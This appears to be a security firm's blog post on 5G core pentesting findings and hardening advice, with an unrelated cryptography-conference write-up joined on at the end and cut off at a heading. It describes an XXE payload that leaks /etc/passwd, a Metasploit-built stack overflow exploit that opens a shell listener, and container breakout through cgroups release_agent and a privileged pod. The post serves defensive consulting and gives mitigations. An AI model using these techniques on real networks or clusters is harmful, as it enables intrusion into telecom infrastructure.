The N1/N2 link carrying the NAS protocol provides mobility management and session management between the User Equipment (UE) and Access and Mobility Management Function (AMF). It is carried over the RRC protocol to/from the UE. A User Plane Function (UPF) is used as a router of user data connections. The Core Network consists of an AMF, a gateway to the core network, which talks to the AUSF/UDM to authenticate the handset with the network; the network also authenticates itself to the handset using a public key. In the core network all components, including a lot of legacy 4G components, are now virtualised, running as Kubernetes pods, with worker nodes running on either a custom cloud environment or an open-source instance like OpenStack. Targeting the 5G NFVI or mobile core cloud via the corporate access is a likely attack vector, either disrupting the service by a DoS attack or acquiring billing data. Similar signalling attacks as in 4G are now prevalent in 5G, due to the same 4G components and associated protocols (e.g. SS7, DIAMETER, GTP) being collocated with 5G components, utilising the legacy 4G network to provide service for the 5G network. Within 5G, HTTP/2 SBI interfaces are now in use between the core components (e.g. AMF/UPF), however due to no or poor encryption it is still possible to either view this traffic or query APIs directly. The diagram below illustrates the various threats against a typical 5G deployment. A fuller, more comprehensive hierarchy of threats is detailed within the MITRE FiGHT attack framework.

“Threats against a typical 5G network”

Reducing the vulnerabilities will decrease the risks and threats an operator will face. However, there is a trade-off between testing time and vulnerabilities found, and we can never guarantee we have found all the issues with a component. When scoping pentesting assessments, we always start with the edge and work our way into the centre of the network, trying to peel away the layers of functionality to expose potential security gaps. The same testing methodology applies to any network, but detailed below are some of the key points that we cover when brought in to consult on 5G network builds.

Segment, restrict and deny all

Simple idea – if an attacker cannot see the service or endpoint then they cannot leverage access to it. A segmented network can improve network performance by containing specific traffic only to the parts of the network that need to see it. It can help to reduce attack surface by limiting lateral movement and preventing an attack from spreading. For example, segmentation ensures malware in one section does not affect systems in another. Segmentation reduces the number of in-scope systems, thereby limiting costs associated with regulatory compliance. However, we still see poor segmentation during engagements, where it was possible to directly connect to management components from the corporate operator network. Implementing VLANs to segment a 5G network is down to the security team and network architects. When considering a network architecture, segmenting the management network from signalling and user data traffic is key. Limiting access to the 5G core, NFVI services and exposed management to a small set of IP ranges using robust firewall rules with an implicit “deny all” statement is required. The Operations Support System (OSS) and Business Support Systems (BSS) are instrumental in managing the network but if not properly segmented from the corporate network can allow an unauthenticated attacker to leverage access to the entire 5G core network. Implementing robust role based access controls and multi-factor access controls to these applications is key, with suitably hardened Privileged Access Workstations (PAW) in place, with access closely monitored. Do not implement a secure 5G core but then allow all 3rd party vendors access to the entire network. Limit access using the principle of least privilege – should vendor A have access by default to vendor B’s management system? The answer is a clear no.
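The "small set of IP ranges plus an implicit deny all" rule described above can be sketched in a few lines. This is only an illustration of the default-deny logic, not a firewall configuration: the subnets and the names `ALLOWED_MGMT_SOURCES` and `is_allowed` are hypothetical and would be replaced by the operator's own ranges.

```python
import ipaddress

# Hypothetical allowlist (assumption): the only source ranges permitted to
# reach management services such as the OSS/BSS or NFVI interfaces.
ALLOWED_MGMT_SOURCES = [
    ipaddress.ip_network("10.50.0.0/28"),   # assumed PAW subnet
    ipaddress.ip_network("10.50.1.10/32"),  # assumed jump host
]


def is_allowed(source_ip: str) -> bool:
    """Return True only if source_ip falls inside an allowlisted range.

    Anything that does not match, including unparsable input, is denied.
    """
    try:
        addr = ipaddress.ip_address(source_ip)
    except ValueError:
        return False  # malformed address: deny
    return any(addr in net for net in ALLOWED_MGMT_SOURCES)


if __name__ == "__main__":
    for candidate in ("10.50.0.5", "10.50.0.16", "192.168.1.1"):
        print(candidate, "allow" if is_allowed(candidate) else "deny")
```

The point of the design is that there is no "deny list" to maintain: a new vendor range gets access only when someone adds it explicitly.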

Limit access to the underlying network switches and routers – be sure to review the configuration of the devices and review the firmware versions. During recent 5G pentesting we have discovered poor default passwords for privileged accounts still in use, allowing access to network components, and even end of support switch and router firmware. If an attacker were able to leverage access to the underlying network components, any virtualised cloud network could simply be cut off from the rest of the enterprise network. Within the new 5G network, software-defined networking (SDN) is used to provide greater network automation and programmability through the use of a centralised controller. However, the SDN controller provides a single point of failure and must have robust security policies in place to protect it. Check the configuration of the SDN controller software. Perhaps it is a Java application with known vulnerabilities. Or is there an unauthenticated northbound REST API exposed to everyone in the enterprise network? Has the SDN controller OS not been hardened – perhaps no account lockout policy and default/weak SSH credentials used?

In short, follow a zero trust principle when designing 5G network infrastructure.

Secure the exposed management edge

An attacker will likely gain access to the corporate network first before pivoting horizontally into the enterprise network via a jumpbox. So secure any services supplying access to the 5G core, whether at the NFVI application layer such as hardware running the cloud instance, the exposed OSS/BSS web applications or any interconnects (e.g. N1/N2 NAS) back to the core. Limit access to the exposed web applications with strong Role Based Access Controls (RBAC) and monitor access. Use a centralised access management platform (e.g. CyberArk) to control and police access to the OSS/BSS platforms. If you have to expose the cloud hardware processing layer to users (e.g. Dell iDRAC/HP iLO), don’t use default credentials, and limit the recovery of remote password hashes. Exposing these underlying hardware control layers to multiple users due to poor segmentation could lead to an attacker conducting a DoS attack by simply turning off servers within the cluster and locking administrators out of the platforms used to manage services.

The myriad of exposed web APIs used for monitoring or control are also a vector for attack. During a recent engagement we discovered an XML External Entity Injection (XXE) vulnerability within an exposed management API and it was possible for an authenticated low privileged attacker to use a vulnerability in the configuration of the XML processor to read any file on the host system.

It was possible to send crafted payloads to the endpoint OSS application located at https://10.1.2.3/oss/conf/ and trigger this vulnerability, which would allow an attacker to:

  • Read the filesystem (including listing directories), which ultimately yielded a valid username for the server running the API, along with the credentials needed to log into that machine’s SSH service.
  • Trigger Server-Side Request Forgery (SSRF).

The resulting authenticated XXE request and response is illustrated below:

Request

POST /oss/conf/blah HTTP/1.1
Host: 10.1.2.3:443
Cookie: JSESSIONID=xxxxxx
[…SNIP…]
<!DOCTYPE root []<nc:rpc xmlns:……..
none test;

Response

HTTP/1.1 200
error-message xml:lang=”en”>/edit-someconfig/default: “noneroot:x:0:0:root:/
root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin
user:x:1000:0::/home/user:/bin/bash

Using this XXE vulnerability, it was possible to read a properties file and recover LDAP credential information and then SSH directly into the host running the API server. In this particular case, once on the host running the containerised web application, the user could read all encrypted password hashes that were stored on the host, utilising the same decryption process and poorly stored key values that were used to encrypt the hashes. The same password was used for the root account and allowed for trivial privilege escalation to root. With root access to the running API server, which in turn was a Docker container running as a Kubernetes pod, it was possible to leverage a vulnerability in the Kubernetes configuration to compromise the container and escalate privileges to the underlying cluster worker node host. To prevent this type of escalation a defense in depth approach is paramount on any Linux host and on any containers. More on this below.
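One common mitigation for the XXE class of issue described above is to refuse any untrusted document that carries a DOCTYPE at all, since entity definitions live in the DTD. The sketch below uses only the Python standard library; `parse_untrusted_xml` and `DTDForbidden` are illustrative names, and this is not how the affected product parsed its input. It is an assumption that the API in question never legitimately needs a DTD.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when an untrusted document carries a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it sees "<!DOCTYPE ...", i.e. before any
    # entity declared inside the DTD could be expanded.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML only if it contains no DTD (and hence no entity definitions)."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(data, True)  # raises DTDForbidden or expat.ExpatError
    return ET.fromstring(data)


if __name__ == "__main__":
    print(parse_untrusted_xml(b"<rpc><edit>ok</edit></rpc>").tag)
    try:
        parse_untrusted_xml(
            b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>'
        )
    except DTDForbidden as exc:
        print("rejected:", exc)
```

Rejecting the DTD outright is blunter than disabling external entities only, but it also removes entity expansion attacks and leaves less room for parser-specific behaviour.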

Implement exploit mitigation measures on binaries

If you expose a service externally be sure to check it is compiled with exploit mitigation measures. Exploitation can be significantly simplified due to the manner in which any service/binary has been built. If a binary has an executable stack, and lacks any modern exploit mitigations such as ASLR, NX, stack cookies, hardened C functions, etc, then an attacker can utilise any issues they might find such as a stack buffer overflow, to get remote code execution (RCE) on the host. This was discovered whilst testing a 5G instance and an exposed sensitive encrypted and proprietary service. This service was exposed externally to the enterprise network, and after a brief analysis showed that it was likely a high risk process due to –

• It was exposed on all network interfaces, making it reachable across the network
• It ran as the root user
• It was built with an executable stack, and no exploit mitigations
• It used unsafe functions such as memcpy, strcat, system, popen etc.
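The executable stack finding in the list above is something that can be checked before a binary is ever deployed. As a minimal sketch, the function below reads an ELF file's program headers and reports whether the `PT_GNU_STACK` entry is marked executable. The function name is our own, it assumes a well-formed ELF image, and it covers only this one mitigation (it says nothing about stack cookies, ASLR or hardened functions).

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type describing stack permissions
PF_X = 0x1                 # "executable" bit in p_flags


def has_executable_stack(elf: bytes):
    """Return True/False from PT_GNU_STACK, or None if that header is absent.

    When the header is absent the loader falls back to a platform default,
    so None should be treated as "needs manual review".
    """
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is_64 = elf[4] == 2                     # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if elf[5] == 1 else ">"    # EI_DATA: 1 = little-endian
    if is_64:
        (phoff,) = struct.unpack_from(endian + "Q", elf, 0x20)
        phentsize, phnum = struct.unpack_from(endian + "HH", elf, 0x36)
        flags_off = 4    # p_flags follows p_type in 64-bit program headers
    else:
        (phoff,) = struct.unpack_from(endian + "I", elf, 0x1C)
        phentsize, phnum = struct.unpack_from(endian + "HH", elf, 0x2A)
        flags_off = 24   # p_flags is the seventh 32-bit field in 32-bit headers
    for i in range(phnum):
        base = phoff + i * phentsize
        (p_type,) = struct.unpack_from(endian + "I", elf, base)
        if p_type == PT_GNU_STACK:
            (p_flags,) = struct.unpack_from(endian + "I", elf, base + flags_off)
            return bool(p_flags & PF_X)
    return None
```

A typical use would be `has_executable_stack(open(path, "rb").read())` inside a build or acceptance pipeline, failing the build when the result is `True`.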

The service took a simple encrypted stream of data that was easily decrypt-able into a configuration message. Analysis of the message/data stream showed an issue with how the buffer data was stored and it was possible to trigger a memory corruption via a stack buffer overflow. After decompiling the binary using Ghidra, it was clear one important value was not used as an input to the function processing a certain string of data making up the configuration message – the size of the buffer used to store the parts of the string. Many of the instances where the function was used were safe due to the size and location of the target buffers. However, one of the elements of the message string was split into 12 parts, the first of which was stored in a short buffer (20 bytes in length) that was located at the end of the stack frame. Due to its length it was possible to overwrite data that was adjacent to the buffer, and due to the buffer’s location, this was the saved instruction pointer. When the function completed, the saved instruction pointer was used to determine where to continue execution. As the attacker could control this value they could take control over the process’s execution flow.

Knowing how to crash the stack, it was possible using Metasploit to determine the offset of the instruction pointer and how much data could be written to the stack. As the stack was executable it was straightforward to find a ROP gadget that would perform the command ‘JMP ESP’. An initial 100 byte payload was generated using Metasploit (pattern_create.rb). This was used to find the offset needed to overwrite the instruction pointer, using the Metasploit pattern_offset.rb script. The shellcode was generated by Metasploit and simply created a remote listener on port 5600. The shellcode was written to the stack after the bytes that control the instruction pointer.
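For readers unfamiliar with the pattern technique mentioned above, the idea is simply to fill the buffer with a non-repeating sequence so that whatever bytes land in the saved instruction pointer identify their own position. The sketch below is a standalone illustration of that idea, not the Metasploit scripts themselves; the upper/lower/digit triple scheme is an assumption modelled on the familiar `Aa0Aa1...` style, and the function names merely echo the script names.

```python
import string


def pattern_create(length: int) -> bytes:
    """Build a non-repeating pattern of upper/lower/digit triples."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode("ascii")
    raise ValueError("length exceeds the unique pattern space")


def pattern_offset(pattern: bytes, observed: bytes) -> int:
    """Return the position of the observed bytes in the pattern, or -1."""
    return pattern.find(observed)


if __name__ == "__main__":
    pattern = pattern_create(100)
    # Assume the crash dump showed these four bytes in the saved pointer,
    # already converted from register byte order back to memory order.
    print(pattern_offset(pattern, pattern[32:36]))
```

The same approach is useful defensively: it lets a tester state precisely how many bytes of attacker-controlled input reach the saved pointer, which makes the finding easy for a vendor to reproduce.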

To find and generate suitable exploit code took around 5-10 days’ work and would require an attacker with good reverse engineering skills. This service was running as root on the 5G virtualised network component and, due to the access that component had within the 5G network, could have been leveraged by an attacker to compromise all other components. During this review the AFL fuzzer was used to determine any other locations within the input stream that could potentially cause a crash. A number of crashes were found, revealing multiple issues with the binary.

“Running AFL fuzzer against the target binary”

To illustrate this issue further, please read our blog post Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks. In this particular open source case, exposing “external” protocols and associated services like the UPF component on a remotely hosted server, not directly within the 5G core, could be leveraged by an attacker to compromise a server (e.g. the SMF) within the 5G core. It is important to bear this in mind when deploying equipment out to the end of the network. Physical access to the component, even when within a roadside cabinet or semi-secure location such as an exchange, is possible, allowing an attacker to leverage access to the 5G core via a not so closely monitored signalling or data plane service. This is more prevalent now with the deployment of OpenRAN components, where multiple services (RU, DU, CU) are now potentially exposed.

Secure the virtualised cloud layer

All 5G cores run on a virtualised cloud system, either a custom-built environment or one from a separate provider such as VMware. The main question is: can an attacker break out of one container or pod to compromise other containers or potentially other clusters? It might even be possible for an attacker to exploit the underlying hypervisor infrastructure if suitably positioned. There are multiple capabilities and settings that can be assigned to a running pod/container – privileged containers, hostpid, sysadmin, docker.sock, hostpath, hostnetwork – that could be overly permissive, allowing an attacker to leverage a feature to mount the underlying host cluster file system or to take full control over the Kubernetes host. We have also seen issues with kernel patching, with a kernel privilege escalation vulnerability leveraged to break out of a container.

During recent testing, security controls on the deployment of pods in the cluster were not enforced by an admission controller. This meant that privileged containers, containers with the node file system mounted, containers running as root users, and containers with host facilities, could be deployed. This would enable any cluster user or principal with pod deployment privileges to compromise the cluster, the workloads, the nodes, and potentially gain access to the wider 5G environment.

The risk to an operator is that any developer with deployment privileges, even to a single namespace, can compromise the underlying node and then access all containers running on that node – which may be from other namespaces they do not have direct privileges for, breaking the separation of role model in use.

Leveraging a vulnerability such as the previous XXE issue or brute forcing SSH login credentials to a Docker container running with overly permissive capabilities has been leveraged on various engagements and is illustrated below.

“Container breakout via initial XXE vulnerability”

As mentioned, it was possible to recover SSH credentials with an XXE vulnerability. Utilising the SSH access and escalating to root permissions on the container, it was possible to abuse a known issue with cgroups to perform privilege escalation and compromise the nodes and cluster from an unprivileged container. The Linux kernel does not check that the process setting the cgroups release_agent file has correct administrative privileges (the CAP_SYS_ADMIN capability in the root namespace), and so an unprivileged container that can create a new namespace with a fake CAP_SYS_ADMIN capability through unshare could force the kernel to execute arbitrary commands when a process completed.


It was possible to enter a namespace with CAP_SYS_ADMIN privileges, and use the notify_on_release feature of cgroups, that did not differentiate between root namespace CAP_SYS_ADMIN and user namespace CAP_SYS_ADMIN, to execute a shell script with root privileges on the underlying host. A syscall breakout was used to execute a reverse shell payload with cluster admin privileges on the underlying cluster host. This is shown below:

“Container breakout utilising cgroups”

Once a shell was created on the underlying Kubernetes cluster host, it was then possible to SSH directly to the RAN cluster using credentials found in backup files, and to exploit any base station equipment. It was also possible to leverage weak security controls on the deployment of pods in the cluster since there was no admission controller. As the exploited cluster user had pod deployment privileges, it was possible to deploy a manifest specifying a master node for the pod to be deployed to; the access gained was root privileges on a master node. This highly privileged access enabled compromise of the whole cluster by obtaining cluster administrator privileges from a kubeconfig file located on the node filesystem.

As a proof of concept attack, the following deployment specification can be used to target the master node by chroot’ing to the underlying host:

“Deploying a bad pod to gain access to master node”

With the kubeconfig file from the master node it is then possible to read all namespaces on the cluster. It would also be possible from the master node to access the underlying hypervisor or virtualisation platform. In some cases, discovered credentials have also allowed us to log directly into the vSphere client and disable hosts.

Strict enforcement of privilege limitations is essential to ensuring that users, containers, and services cannot bridge the containerisation layers of container, namespace, cluster, node, and hosting service. It should be noted that if only a small number of principals have access to a cluster, and they all require cluster administration privileges, then a cluster admin could likely modify any admission controller policies. However, best practice is to implement business policies and enforce the blocking of containers with weak security controls. Equally, if more roles are added to the administration model at a later date, then the value of implementing admission controllers increases. In short, the main recommendation is to ensure appropriate privilege security controls are enforced to prevent deployments having access to, or the ability to compromise, other layers of the orchestration model. Consider limiting which worker nodes containers can be deployed to, and which insecure manifest configurations can be deployed.
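To make the kind of policy an admission controller would enforce more concrete, here is a minimal sketch of the checks involved, written as a plain function over a pod manifest that has already been loaded into a dictionary. It is not an admission webhook and not any particular policy engine; `find_violations` is a hypothetical name, and the set of checks simply mirrors the risky settings discussed in this section.

```python
# Capabilities treated as unacceptable in this sketch (assumption).
RISKY_CAPABILITIES = {"SYS_ADMIN", "ALL"}


def find_violations(pod: dict) -> list[str]:
    """Return human-readable reasons why a pod manifest should be rejected."""
    spec = pod.get("spec", {})
    problems = []

    # Host namespaces shared with the pod.
    for flag in ("hostPID", "hostNetwork"):
        if spec.get(flag):
            problems.append(f"spec.{flag} is enabled")

    # Any hostPath volume exposes part of the node filesystem
    # (this includes mounting docker.sock).
    for volume in spec.get("volumes", []):
        if "hostPath" in volume:
            problems.append(f"volume {volume.get('name')} mounts hostPath")

    for container in spec.get("containers", []):
        name = container.get("name")
        ctx = container.get("securityContext") or {}
        if ctx.get("privileged"):
            problems.append(f"container {name} is privileged")
        if ctx.get("runAsUser") == 0:
            problems.append(f"container {name} runs as UID 0")
        added = set((ctx.get("capabilities") or {}).get("add", []))
        for cap in sorted(added & RISKY_CAPABILITIES):
            problems.append(f"container {name} adds capability {cap}")
    return problems
```

In practice the same rules would live in the cluster's admission layer so that they apply to every deployment path, rather than in a script that a developer can bypass.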

Scan, verify, monitor and patch all images regularly

It is important when deploying virtualised container images to check regularly for any changes to the underlying OS, audit events such as logins, and patch all critical vulnerabilities as soon as possible. Basic vulnerability management is key: identifying and preventing risks to all the hosts, images and functions. Images should be scanned by default before they are deployed, and again at regular intervals.

For instance, if a Kubernetes cluster is utilising a Harbor registry, simply enabling the “Automatically scan images on push” vulnerability scanning option, with a suitable tool such as Trivy and a regularly updated set of vulnerabilities, will suffice. It is even possible to prevent images with vulnerabilities above a certain severity from running. Implementing signed images or content trust also gives you the ability to verify both the integrity and the publisher of all the data received from a registry over any channel.

“Setting harbor to automatically scan images”
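The severity gate described above can also be applied outside the registry, for example as a pipeline step that inspects a scan report before an image is promoted. The sketch below assumes a report shaped like Trivy's JSON output (a `Results` list whose entries carry a `Vulnerabilities` list with `VulnerabilityID` and `Severity` fields); verify the field names against the scanner version in use. The function name and the choice of blocking severities are our own.

```python
# Severities that stop a deployment in this sketch (assumption).
BLOCKING_SEVERITIES = frozenset({"CRITICAL", "HIGH"})


def blocking_findings(report: dict, blocking=BLOCKING_SEVERITIES) -> list[str]:
    """Return the IDs of findings whose severity should block the image."""
    ids = []
    for result in report.get("Results", []):
        # "Vulnerabilities" may be missing or null for clean targets.
        for vuln in result.get("Vulnerabilities") or []:
            if str(vuln.get("Severity", "")).upper() in blocking:
                ids.append(vuln.get("VulnerabilityID", "unknown"))
    return ids


if __name__ == "__main__":
    sample = {
        "Results": [
            {"Target": "app", "Vulnerabilities": [
                {"VulnerabilityID": "EXAMPLE-0001", "Severity": "CRITICAL"},
                {"VulnerabilityID": "EXAMPLE-0002", "Severity": "LOW"},
            ]},
            {"Target": "base", "Vulnerabilities": None},
        ]
    }
    found = blocking_findings(sample)
    print("block" if found else "allow", found)
```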

Use tighter contracts with vendors to enforce quicker delivery of image patches, and verify as far as possible that patches have not changed the underlying functionality. Enforcing the use of hardened Linux OS images is best practice, utilising CIS benchmark scans to verify OS images have been hardened. This is also important on the underlying cluster hosts. Our recommendation is to move security back to the developer or vendor with a secure Continuous Integration and Continuous Delivery (CI/CD) pipeline with Open Policy Agent integrations to secure workloads across the Software Development Life Cycle (SDLC). NCC Group conducts regular reviews of CI/CD pipelines and can help you understand the issues. Please check out 10 real world stories of how we’ve compromised ci/cd pipelines for further details.

If possible, get a software bill of materials (SBOM) from vendors. An SBOM is an industry best practice in secure software development that enhances the understanding of the upstream software supply chain, so that vulnerability notifications and updates can be properly and safely handled across the installed customer base. The SBOM documents proprietary and third-party software, including commercial and free and open source software (FOSS), used in software products. The SBOM should be maintained and used by the software supplier and stored and viewed by the network operator. Operators should periodically check it against known vulnerability databases to identify potential risk. However, the level of risk for a vulnerability should be determined by the software vendor and operator with consideration of the software product, use case, and network environment.

Once an image is running, verifying the running services with some kind of runtime defence is key. This will entail implementing strong auditing utilising auditd and syslog to monitor kernel, process and access logs. We have seen deployments with no use of these services and no use of any antivirus. Securing containers with Seccomp and either AppArmor or SELinux would be enough to prevent container escape. Taking all the logging data into a suitable active defence engine could allow for more predictive and threat-based active protection for running containers. Predictive protection could include capabilities like determining when a container runs a process not included in the origin image or creates an unexpected network socket. Threat-based protection includes capabilities like detecting when malware is added to a container or when a container connects to a botnet. Utilising machine learning to build a behavioural model for each running container in the cluster is highly recommended. Applied intelligence used for monitoring log data is key for any threat prevention, helping the SOC to quickly identify key 5G attack vectors.
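The "process not included in the origin image" check mentioned above reduces, at its simplest, to comparing what is running against a baseline recorded when the image was built. The sketch below shows only that comparison; how the baseline and the observed process list are collected (audit logs, a runtime agent, and so on) is left open, and the names and paths are hypothetical.

```python
def unexpected_processes(baseline: set[str], observed: list[str]) -> list[str]:
    """Return executables seen at runtime that are not in the image baseline."""
    return sorted({path for path in observed if path not in baseline})


if __name__ == "__main__":
    # Hypothetical baseline recorded for a container image at build time.
    image_baseline = {"/usr/bin/java", "/bin/sh"}
    # Hypothetical runtime observations, e.g. parsed from audit logs.
    seen = ["/usr/bin/java", "/tmp/.x/miner", "/bin/sh", "/usr/bin/nc"]
    for path in unexpected_processes(image_baseline, seen):
        print("ALERT: unexpected process", path)
```

A learned per-container model, as recommended above, generalises this from an exact allowlist to a statistical notion of normal behaviour.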

Implement 5G security functions

Previous generations of cellular networks failed to provide confidentiality and integrity protection for some pre-authentication signalling messages, allowing attackers to exploit multiple vulnerabilities such as IMSI sniffing or downgrade attacks. The 5G standard facilitates a base level of security with various security features. However, we have seen during engagements that these are not enabled.

The 5G network uses data encryption and integrity protection mechanisms to safeguard data transmitted by the enterprise, prevent information leakage and enhance data security for the enterprise. Not implementing these will compromise the confidentiality, integrity and availability (CIA) of that data.

5G introduces novel protection mechanisms specifically designed for signalling and user data. 5G security controls outlined in 3GPP Release 15 include:

• Subscriber permanent identifier (SUPI) – a unique identifier for the subscriber
• Dual authentication and key agreement (AKA)
• Anchor key is used to identify and authenticate UE. The key is used to create secure access throughout the 5G infrastructure
• X.509 certificates and PKI are used to protect various non-UE devices
• Encryption keys are used to demonstrate the integrity of signalling data
• Authentication when moving from 3GPP to non-3GPP networks
• Security anchor function (SEAF) allows reauthentication of the UE when it moves between different network access points
• The home network carries out the original authentication based on the home profile (home control)
• Encryption keys will be based on IP network protocols and IPSec
• Security edge protection proxy (SEPP) protects the home network edge
• 5G separates control and data plane traffic

Besides increasing the length of the key algorithms (to 256-bit expected for future 3GPP releases), 5G forces mandatory integrity support of the user plane, and extends confidentiality and integrity protection to the initial NAS messages. The table below summarises in various columns the standard requirements in terms of confidentiality and integrity protection as defined in the 3GPP specs. 5G also secures the UE network capabilities, a field within the initial NAS message, which is used to allow UEs to report to the AMF about the supported integrity and encryption algorithms in the initial NAS message.

In general there has been an increase in the number of security features in 5G to address issues found with the legacy 2G, 3G and 4G network deployments and various published exploits. These have been included within the different 3GPP specifications and adopted by the various vendors. It should be noted that a lot of the security features are optional and the implementation of these is down to the operator rather than the vendor.

The only security features that are defined as mandatory within the 5G standards are integrity checking of the RRC/NAS signalling plane and on the IPX interface the mandatory use of a Security Edge Protection Proxy (SEPP). The SUPI encryption is optional but in the UK this is required due to GDPR.

“Table illustrating various 4G / 5G security functions”

As shown, user plane integrity protection is still optional and so is still, in theory, vulnerable to attacks such as malicious redirection of traffic using a DNS response. Some providers now turn on the new integrity protection feature for the user plane by default and prevent an attacker from forcing the network to use a less secure algorithm. In 4G, a series of GRX firewalls are in place to limit attacks via the IPX network, but due to the use of HTTPS in 5G control messages a new SEPP device is mandated to allow matching of control and user plane sessions.

By collecting 5G signalling traffic it is possible to check implementations and analyse the vulnerabilities. NCC Group conducts these assessments and advises clients on implementing various optional security features, either related to 5G or to other legacy systems, such as enabling the A5/4 algorithm on GSM networks. This issue is illustrated clearly within the paper European 5G Security in the Wild: Reality versus Expectations. This paper highlights the lack of concealment of permanent identifiers and the fact it was possible to capture the permanent IMSI and IMEI values, which are sent without protection within the NAS Identity Response message. Issues with the temporary identifier and GUTI refresh have also been observed. After receiving the NAS Attach Accept and RRC Connection Request messages, the m-TMSI value was not refreshed, only changing during a Registration procedure. This would allow TMSI tracking and possible geolocation of 5G user handsets.
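When reviewing captured signalling for the temporary identifier issue described above, one simple measure is how long each TMSI value stays in use. The sketch below assumes the capture has already been reduced to `(timestamp_seconds, tmsi)` pairs; the extraction from raw NAS/RRC traffic, the function names and the one-hour threshold are all assumptions for illustration, not values taken from the 3GPP specifications or the cited paper.

```python
def tmsi_lifetimes(observations):
    """Map each TMSI to (first_seen, last_seen, times_seen)."""
    seen = {}
    for timestamp, tmsi in observations:
        first, last, count = seen.get(tmsi, (timestamp, timestamp, 0))
        seen[tmsi] = (min(first, timestamp), max(last, timestamp), count + 1)
    return seen


def long_lived(observations, max_age_s):
    """Return TMSIs observed over a span longer than max_age_s seconds."""
    lifetimes = tmsi_lifetimes(observations)
    return sorted(
        tmsi for tmsi, (first, last, _count) in lifetimes.items()
        if last - first > max_age_s
    )


if __name__ == "__main__":
    # Hypothetical observations: (seconds since capture start, TMSI as hex).
    capture = [(0, "c0ffee01"), (600, "c0ffee01"),
               (4000, "c0ffee01"), (4100, "deadbeef")]
    print(long_lived(capture, max_age_s=3600))
```

A value that persists across many procedures is exactly what makes passive tracking of a handset feasible.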

As 5G networks become more mature and deployments progress to full 5G SA deployments, it is likely issues affecting the network will be addressed. However, it is important to implement and test these new security features as soon as possible to prevent a compromise.

Summary

The 5G network is a complex environment, requiring methodical, comprehensive reviews to secure the entire stack. Often a company may lack the time, specialist security knowledge, and people needed to secure their network. Fundamentally, a 5G network must be configured properly and robustly tested, with its security features enabled.

As seen above, most compromises can be traced back to the following root causes:

• Lack of segmentation and segregation
• Default configurations
• Over permissive permissions and roles
• Poor patching
• Lack of security controls

Real World Cryptography Conference 2023 – Part II

After a brief interlude, filled with several articles from the Cryptography Services team, we’re back with our final thoughts from this year’s Real World Cryptography Conference. In case you missed it, check out Part I for more insights.

  1. Interoperability in E2EE Messaging
  2. Threshold ECDSA Towards Deployment
  3. The Path to Real World FHE: Navigating the Ciphertext Space
  4. High-Assurance Go Cryptography in Practice

Interoperability in E2EE Messaging

A specter is haunting Europe – the specter of platform interoperability. The EU signed the Digital Markets Act (DMA) into law in September of last year, mandating chat platforms provide support for interoperable communications. This requirement will be in effect by March of 2024, an aggressive timeline requiring fast action from cryptographic (and regular) engineers. There are advantages to interoperability. It allows users to communicate with their friends and family across platforms, and it allows developers to build applications that work across platforms. There is the potential for this to partially mitigate the network effects associated with platform lock-in, which could lead to more competition and greater freedom of choice for end users. However, interoperability requires shared standards, and standards tend to imply compromise. This is a particularly severe challenge with secure chat apps which aim to provide their users with high levels of security. Introducing hastily designed, legislatively mandated components into these systems is a high-risk change which, in the worst case, could introduce weaknesses that would be difficult to fix (due to the effects of lock-in and the corresponding level of coordination and engineering effort required). This is further complicated by the heterogeneity of the field in regard to end-to-end encrypted chat: E2EE protocols vary by ciphersuite, level and form of authentication, personal identifier (email, phone number, username/password, etc.), and more. Any standardized design for interoperability would need to be able to manage all this complexity. This presentation on work by Ghosh, Grubbs, Len, and Rösler discussed one effort at introducing such a standard for interoperability between E2EE chat apps, focused on extending existing components of widely used E2EE apps. This is appropriate as these apps are most likely to be identified as “gatekeeper” apps to which the upcoming regulations apply in force.
The proposed solution uses server-to-server interoperability, in which each end user is only required to directly communicate with their own messaging provider. Three main components of messaging affected by the DMA are identified: identity systems, E2EE protocols, and abuse prevention.

  • For the first of these items, a system for running encrypted queries to remote providers’ identity systems is proposed; this allows user identities to be associated with keys in such a way that the actual identity data is abstracted and thus could be an email, a phone number, or an arbitrary string.
  • For the second issue, E2EE protocols, a number of simple solutions are considered and rejected; the final proposal has several parts. Sender-anonymous wrappers are proposed, using a variant of the Sealed Sender protocol from Signal, to hide sender metadata; for encryption in transit, non-gatekeeper apps can use an encapsulated implementation of a gatekeeper app’s E2EE through a client bridge. This provides both confidentiality and authenticity, while minimizing metadata leakage.
  • For the third issue, abuse prevention, a number of options (including “doing nothing”) are again considered and rejected. The final design is somewhat nonobvious, and consists of server-side spam filtering, user reporting (via asymmetric message franking, one of the more cryptographically fresh and interesting parts of the system), and blocklisting (which requires a small data leakage, in that the initiator would need to share the blocked party’s user ID with their own server).

Several open problems were also identified (these points are quoted directly from the slides):

  • How do we improve the privacy of interoperable E2EE by reducing metadata leakage?
  • How do we extend other protocols used in E2EE messaging, like key transparency, into the interoperability setting?
  • How do we extend our framework and analyses to group chats and encrypted calls?

This is important and timely work on a topic which has the potential to result in big wins for user privacy and user experience; however, this best-case scenario will only play out if players in industry and academia can keep pace with the timeline set by the DMA. This requires quick work to design, implement, and review these protocols, and we look forward to seeing how these systems take shape in the months to come.

Eli Sohl

Threshold ECDSA Towards Deployment

